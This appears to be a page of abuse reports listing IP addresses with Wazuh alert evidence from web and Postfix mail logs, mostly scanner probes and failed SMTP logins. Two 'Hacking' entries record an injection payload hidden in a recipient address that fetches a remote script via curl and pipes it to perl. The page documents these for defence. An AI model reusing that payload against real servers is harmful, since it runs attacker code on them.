|
๐บ๐ธ
20.15.228.93
|
|
Wazuh Alert Evidence: 20.15.228.93 - - [15/Sep/2026:01:06:51 +0000] "GET / HTTP/1.1" 403 146 "-" "Mo ...
show more
Wazuh Alert Evidence: 20.15.228.93 - - [15/Sep/2026:01:06:51 +0000] "GET / HTTP/1.1" 403 146 "-" "Mozilla/5.0 zgrab/0.x" "-" Origin: "-" CORS_Header: "-" Sent_allow_origin: "-"
show less
|
Web App Attack
|
|
๐ฉ๐ช
31.70.91.79
|
|
Wazuh Alert Evidence: Sep 15 00:29:01 ms1.triiix.info postfix/smtpd[2368815]: warning: ip31-70-91-79 ...
show more
Wazuh Alert Evidence: Sep 15 00:29:01 ms1.triiix.info postfix/smtpd[2368815]: warning: ip31-70-91-79.pbiaas.com[31.70.91.79]: SASL login authentication failed: (reason unavailable), sasl_username=noauth
show less
|
Brute-Force
|
|
๐บ๐ธ
40.124.186.184
|
|
Wazuh Alert Evidence: 40.124.186.184 - - [14/Sep/2026:23:36:01 +0000] "GET /ecp/Current/exporttool/m ...
show more
Wazuh Alert Evidence: 40.124.186.184 - - [14/Sep/2026:23:36:01 +0000] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/2.0" 403 106 "-" "Mozilla/5.0 zgrab/0.x" "-" Origin: "-" CORS_Header: "-" Sent_allow_origin: "-"
show less
|
Web App Attack
|
|
๐ฌ๐ง
138.68.143.68
|
|
Wazuh Alert Evidence: 138.68.143.68 - - [14/Sep/2026:23:21:26 +0000] "GET / HTTP/1.1" 403 146 "-" "M ...
show more
Wazuh Alert Evidence: 138.68.143.68 - - [14/Sep/2026:23:21:26 +0000] "GET / HTTP/1.1" 403 146 "-" "Mozilla/5.0 zgrab/0.x" "-" Origin: "-" CORS_Header: "-" Sent_allow_origin: "-"
show less
|
Web App Attack
|
|
๐ณ๐ฑ
45.156.128.129
|
|
Wazuh Alert Evidence: 45.156.128.129 - - [14/Sep/2026:22:45:03 +0000] "GET /wp-json HTTP/1.1" 404 54 ...
show more
Wazuh Alert Evidence: 45.156.128.129 - - [14/Sep/2026:22:45:03 +0000] "GET /wp-json HTTP/1.1" 404 548 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36" "-" Origin: "-" CORS_Header: "-" Sent_allow_origin: "-"
show less
|
Web App Attack
|
|
๐ณ๐ฑ
45.156.128.37
|
|
Wazuh Alert Evidence: 45.156.128.37 - - [14/Sep/2026:22:45:04 +0000] "GET /license.txt HTTP/1.1" 404 ...
show more
Wazuh Alert Evidence: 45.156.128.37 - - [14/Sep/2026:22:45:04 +0000] "GET /license.txt HTTP/1.1" 404 548 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36" "-" Origin: "-" CORS_Header: "-" Sent_allow_origin: "-"
show less
|
Web App Attack
|
|
๐ฌ๐ง
89.37.172.135
|
|
Wazuh Alert Evidence: 89.37.172.135 - - [14/Sep/2026:22:37:18 +0000] "GET /api/getData?path=player%3 ...
show more
Wazuh Alert Evidence: 89.37.172.135 - - [14/Sep/2026:22:37:18 +0000] "GET /api/getData?path=player%3Aplayer%2Fdata&roles=value HTTP/1.1" 404 146 "-" "-" "-" Origin: "-" CORS_Header: "-" Sent_allow_origin: "-"
show less
|
Web App Attack
|
|
๐บ๐ธ
40.80.204.79
|
|
Wazuh Alert Evidence: 40.80.204.79 - - [14/Sep/2026:22:06:45 +0000] "GET /developmentserver/metadata ...
show more
Wazuh Alert Evidence: 40.80.204.79 - - [14/Sep/2026:22:06:45 +0000] "GET /developmentserver/metadatauploader HTTP/1.1" 403 117 "-" "Mozilla/5.0 zgrab/0.x" "-" Origin: "-" CORS_Header: "-" Sent_allow_origin: "-"
show less
|
Web App Attack
|
|
๐ท๐บ
45.91.64.6
|
|
Wazuh Alert Evidence: 45.91.64.6 - - [14/Sep/2026:21:28:19 +0000] "GET / HTTP/1.1" 400 150 "-" "-" " ...
show more
Wazuh Alert Evidence: 45.91.64.6 - - [14/Sep/2026:21:28:19 +0000] "GET / HTTP/1.1" 400 150 "-" "-" "-" Origin: "-" CORS_Header: "-" Sent_allow_origin: "-"
show less
|
Web App Attack
|
|
๐น๐ผ
128.14.226.191
|
|
Wazuh Alert Evidence: Sep 14 21:11:42 ms1.triiix.info postfix/smtpd[2366933]: warning: unknown[128.1 ...
show more
Wazuh Alert Evidence: Sep 14 21:11:42 ms1.triiix.info postfix/smtpd[2366933]: warning: unknown[128.14.226.191]: SASL NTLM authentication failed: Invalid authentication mechanism, sasl_username=(unavailable)
show less
|
Brute-Force
|
|
๐บ๐ธ
66.132.186.202
|
|
Wazuh Alert Evidence: 66.132.186.202 - - [14/Sep/2026:20:57:27 +0000] "PRI * HTTP/2.0" 400 150 "-" " ...
show more
Wazuh Alert Evidence: 66.132.186.202 - - [14/Sep/2026:20:57:27 +0000] "PRI * HTTP/2.0" 400 150 "-" "-" "-" Origin: "-" CORS_Header: "-" Sent_allow_origin: "-"
show less
|
Web App Attack
|
|
๐ฌ๐ง
104.218.164.192
|
|
Wazuh Alert Evidence: Sep 14 20:52:19 ms1.triiix.info postfix/submission/smtpd[2366801]: warning: un ...
show more
Wazuh Alert Evidence: Sep 14 20:52:19 ms1.triiix.info postfix/submission/smtpd[2366801]: warning: unknown[104.218.164.192]: SASL NTLM authentication failed: Invalid authentication mechanism, sasl_username=(unavailable)
show less
|
Brute-Force
|
|
๐บ๐ธ
172.245.142.56
|
|
Wazuh Alert Evidence: 172.245.142.56 - - [14/Sep/2026:20:32:10 +0000] "GET / HTTP/1.1" 400 248 "-" " ...
show more
Wazuh Alert Evidence: 172.245.142.56 - - [14/Sep/2026:20:32:10 +0000] "GET / HTTP/1.1" 400 248 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0" "-" Origin: "-" CORS_Header: "-" Sent_allow_origin: "-"
show less
|
Web App Attack
|
|
๐ฉ๐ช
64.89.163.14
|
|
Wazuh Alert Evidence: 64.89.163.14 - - [14/Sep/2026:19:51:18 +0000] "GET /.env HTTP/1.1" 403 179 "-" ...
show more
Wazuh Alert Evidence: 64.89.163.14 - - [14/Sep/2026:19:51:18 +0000] "GET /.env HTTP/1.1" 403 179 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" Origin: "-" CORS_Header: "-" Sent_allow_origin: "-"
show less
|
Web App Attack
|
|
๐ง๐ช
198.235.24.214
|
|
Wazuh Alert Evidence: 198.235.24.214 - - [14/Sep/2026:19:50:11 +0000] "GET / HTTP/1.0" 403 146 "-" " ...
show more
Wazuh Alert Evidence: 198.235.24.214 - - [14/Sep/2026:19:50:11 +0000] "GET / HTTP/1.0" 403 146 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" Origin: "-" CORS_Header: "-" Sent_allow_origin: "-"
show less
|
Web App Attack
|
|
๐บ๐ธ
20.40.218.246
|
|
Wazuh Alert Evidence: 20.40.218.246 - - [14/Sep/2026:18:46:37 +0000] "GET /manager/html HTTP/1.1" 40 ...
show more
Wazuh Alert Evidence: 20.40.218.246 - - [14/Sep/2026:18:46:37 +0000] "GET /manager/html HTTP/1.1" 400 248 "-" "Mozilla/5.0 zgrab/0.x" "-" Origin: "-" CORS_Header: "-" Sent_allow_origin: "-"
show less
|
Web App Attack
|
|
๐ฏ๐ต
139.162.119.196
|
|
Wazuh Alert Evidence: 139.162.119.196 - - [14/Sep/2026:17:52:56 +0000] "GET / HTTP/1.0" 403 146 "-" ...
show more
Wazuh Alert Evidence: 139.162.119.196 - - [14/Sep/2026:17:52:56 +0000] "GET / HTTP/1.0" 403 146 "-" "-" "-" Origin: "-" CORS_Header: "-" Sent_allow_origin: "-"
show less
|
Web App Attack
|
|
๐ฉ๐ช
167.172.165.37
|
|
Wazuh Alert Evidence: 167.172.165.37 - - [14/Sep/2026:17:43:34 +0000] "GET / HTTP/1.1" 400 248 "-" " ...
show more
Wazuh Alert Evidence: 167.172.165.37 - - [14/Sep/2026:17:43:34 +0000] "GET / HTTP/1.1" 400 248 "-" "Go-http-client/1.1" "-" Origin: "-" CORS_Header: "-" Sent_allow_origin: "-"
show less
|
Web App Attack
|
|
๐ธ๐ฎ
102.220.161.79
|
|
Wazuh Alert Evidence: 102.220.161.79 - - [14/Sep/2026:17:13:55 +0000] "CONNECT 102.220.161.79:80 HTT ...
show more
Wazuh Alert Evidence: 102.220.161.79 - - [14/Sep/2026:17:13:55 +0000] "CONNECT 102.220.161.79:80 HTTP/1.0" 400 150 "-" "-" "-" Origin: "-" CORS_Header: "-" Sent_allow_origin: "-"
show less
|
Web App Attack
|
|
๐บ๐ธ
15.204.233.32
|
|
Wazuh Alert Evidence: Sep 14 16:41:58 ms1.triiix.info postfix/submission/smtpd[2365767]: NOQUEUE: re ...
show more
Wazuh Alert Evidence: Sep 14 16:41:58 ms1.triiix.info postfix/submission/smtpd[2365767]: NOQUEUE: reject: RCPT from vps-54783114.vps.ovh.us[15.204.233.32]: 554 5.7.1 <vps-54783114.vps.ovh.us[15.204.233.32]>: Client host rejected: Access denied; from=<[email protected]> to=<"x: Service status change: localhost $(curl -sS http://154.70.152.216/zed|perl &) changed from stopped to running"@cve.invalid> proto=ESMTP helo=<mx-test.invalid>
show less
|
Hacking
|
|
๐บ๐ธ
15.204.107.168
|
|
Wazuh Alert Evidence: Sep 14 16:38:43 ms1.triiix.info postfix/submission/smtpd[2365683]: NOQUEUE: re ...
show more
Wazuh Alert Evidence: Sep 14 16:38:43 ms1.triiix.info postfix/submission/smtpd[2365683]: NOQUEUE: reject: RCPT from ns1029336.ip-15-204-107.us[15.204.107.168]: 554 5.7.1 <ns1029336.ip-15-204-107.us[15.204.107.168]>: Client host rejected: Access denied; from=<[email protected]> to=<"x: Service status change: localhost $(curl -sS http://154.70.152.216/zed | perl &) changed from stopped to running"@cve.invalid> proto=ESMTP helo=<attacker.com>
show less
|
Hacking
|
|
๐จ๐ณ
94.231.206.36
|
|
Wazuh Alert Evidence: 94.231.206.36 - - [14/Sep/2026:16:37:13 +0000] "GET / HTTP/1.1" 403 162 "-" "M ...
show more
Wazuh Alert Evidence: 94.231.206.36 - - [14/Sep/2026:16:37:13 +0000] "GET / HTTP/1.1" 403 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" Origin: "-" CORS_Header: "-" Sent_allow_origin: "-"
show less
|
Web App Attack
|
|
๐บ๐ธ
74.50.96.138
|
|
Wazuh Alert Evidence: 74.50.96.138 - - [14/Sep/2026:15:52:28 +0000] "GET /api/session/properties HTT ...
show more
Wazuh Alert Evidence: 74.50.96.138 - - [14/Sep/2026:15:52:28 +0000] "GET /api/session/properties HTTP/1.1" 404 271 "-" "metabase-cve-2026-72898-detect/1.0 (benign detection probes only)" "236.25.195.141" Origin: "-" CORS_Header: "-" Sent_allow_origin: "-"
show less
|
Web App Attack
|
|
๐บ๐ธ
34.24.66.87
|
|
Wazuh Alert Evidence: 34.24.66.87 - - [14/Sep/2026:14:44:48 +0000] "POST / HTTP/1.1" 403 179 "-" "Mo ...
show more
Wazuh Alert Evidence: 34.24.66.87 - - [14/Sep/2026:14:44:48 +0000] "POST / HTTP/1.1" 403 179 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" Origin: "-" CORS_Header: "-" Sent_allow_origin: "-"
show less
|
Web App Attack
|
|
๐บ๐ธ
20.65.146.45
|
|
Wazuh Alert Evidence: 20.65.146.45 - - [14/Sep/2026:13:45:54 +0000] "GET / HTTP/1.1" 403 117 "-" "Mo ...
show more
Wazuh Alert Evidence: 20.65.146.45 - - [14/Sep/2026:13:45:54 +0000] "GET / HTTP/1.1" 403 117 "-" "Mozilla/5.0 zgrab/0.x" "-" Origin: "-" CORS_Header: "-" Sent_allow_origin: "-"
show less
|
Web App Attack
|